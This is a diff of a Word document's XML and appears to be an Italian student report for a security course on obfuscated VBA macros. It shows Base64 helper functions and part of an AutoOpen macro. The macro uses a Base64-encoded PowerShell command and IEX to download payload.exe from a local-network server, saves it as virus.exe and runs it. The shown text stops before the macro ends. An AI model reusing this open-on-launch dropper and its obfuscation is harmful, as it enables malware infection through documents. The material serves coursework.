+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>una</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>stringa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in input in base 64 e </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>restituisce</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> la </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>stringa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>codificata</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -309,12 +976,28 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">    Dim objXML As Object</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Dim objNode As Object</w:t>
+        <w:t xml:space="preserve">    Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objXML</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objNode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As Object</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -327,17 +1010,82 @@
         <w:rPr>
           <w:color w:val="92D050"/>
         </w:rPr>
-        <w:t xml:space="preserve">    ' Crea un oggetto XML</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Set objXML = CreateObject("MSXML2.DOMDocument")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Set objNode = objXML.createElement("b64")</w:t>
+        <w:t xml:space="preserve">    ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Crea</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> un </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>oggetto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> XML</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objXML</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>CreateObject</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>"MSXML2.DOMDocument")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objNode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objXML.createElement</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("b64")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -350,17 +1098,99 @@
         <w:rPr>
           <w:color w:val="92D050"/>
         </w:rPr>
-        <w:t xml:space="preserve">    ' Imposta il testo del nodo con il comando da codificare</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    objNode.dataType = "bin.base64"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    objNode.nodeTypedValue = stringaABinario(str)</w:t>
+        <w:t xml:space="preserve">    ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Imposta</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il testo del </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>nodo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> con il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>codificare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objNode.dataType</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = "</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>bin.base</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>64"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objNode.nodeTypedValue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringaABinario</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(str)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -373,13 +1203,74 @@
         <w:rPr>
           <w:color w:val="92D050"/>
         </w:rPr>
-        <w:t xml:space="preserve">    ' Restituisci il risultato della codifica base64</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    EncodeBase64 = objNode.text</w:t>
-      </w:r>
+        <w:t xml:space="preserve">    ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Restituisci</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>risultato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>della</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>codifica</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> base64</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    EncodeBase64 = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objNode.text</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -391,17 +1282,47 @@
         <w:rPr>
           <w:color w:val="92D050"/>
         </w:rPr>
-        <w:t xml:space="preserve">    ' Libera l'oggetto XML</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Set objNode = Nothing</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Set objXML = Nothing</w:t>
+        <w:t xml:space="preserve">    ' Libera </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>l'oggetto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> XML</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objNode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = Nothing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objXML</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = Nothing</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -420,12 +1341,89 @@
         <w:rPr>
           <w:color w:val="92D050"/>
         </w:rPr>
-        <w:t>' Converte una stringa in input in dati binari</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Function stringaABinario(s As String) As Variant</w:t>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Converte</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>una</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>stringa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in input in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>dati</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>binari</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Function </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>stringaABinario</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>s As String) As Variant</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -435,48 +1433,158 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">    Set ado = CreateObject("ADODB.Stream")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    ado.Type = 2 ' adTypeText</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    ado.Charset = "us-ascii"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    ado.Open</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    ado.WriteText s</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    ado.Position = 0</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    ado.Type = 1 ' adTypeBinary</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    stringaABinario = ado.Read</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    ado.Close</w:t>
-      </w:r>
+        <w:t xml:space="preserve">    Set ado = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>CreateObject</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ADODB.Stream</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ado.Type</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = 2 ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>adTypeText</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ado.Charset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = "us-ascii"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ado.Open</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ado.WriteText</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> s</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ado.Position</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = 0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ado.Type</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = 1 ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>adTypeBinary</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringaABinario</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ado.Read</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ado.Close</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -485,7 +1593,6 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>End Function</w:t>
       </w:r>
     </w:p>
@@ -494,12 +1601,141 @@
         <w:pStyle w:val="Titolo1"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>VBA MACRO</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>In questa sezione dovete presentare il codice della macro prima che venga offuscato, le tecniche adottate per offuscare il codice e il codice della macro offuscato.</w:t>
+        <w:t xml:space="preserve">In </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>questa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sezione</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dovete</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>presentare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codice</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>della</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> macro prima </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>che</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>venga</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>offuscato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, le </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tecniche</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>adottate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>offuscare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codice</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> e il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codice</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>della</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> macro </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>offuscato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -516,270 +1752,659 @@
         </w:rPr>
         <w:t>CODICE MACRO</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Sub AutoOpen()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Dim comandoDecodificato As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Dim comandoDecodificato2 As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Dim codificato As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Dim codificato2 As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Dim comandoBase64 As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Dim comandoDaEseguire As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Dim comandoDaEseguire2 As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Dim shell As Object</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Set shell = VBA.CreateObject("WScript.Shell")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    ' comando per scaricare il file malevolo</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    comandoDecodificato = "(New-Object Net.WebClient).DownloadFile('" &amp; </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:t>"http://192.168.1.98:8000/payload.exe" &amp; "', '" &amp; "C:\Users\crist\Downloads\virus.exe" &amp; "')"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    ' comando per eseguire il file malevolo</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    comandoDecodificato2 = " &amp; 'C:\Users\crist\Downloads\virus.exe'"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    ' codifico i comandi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (questa parte non dovrebb esserci, è solo a scopo dimostrativo)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    codificato = EncodeBase64(comandoDecodificato)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    codificato2 = EncodeBase64(comandoDecodificato2)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>' Comando PowerShell codificato in base64</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>, serve per convertire le stringhe da base64</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    comandoBase64 = "IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('BASE64_ENCODED_COMMAND')))"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    ' decodifico i due comandi da base64 a normali</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    comandoDaEseguire = Replace(comandoBase64, "BASE64_ENCODED_COMMAND", codificato)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    comandoDaEseguire2 = Replace(comandoBase64, "BASE64_ENCODED_COMMAND", codificato2)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
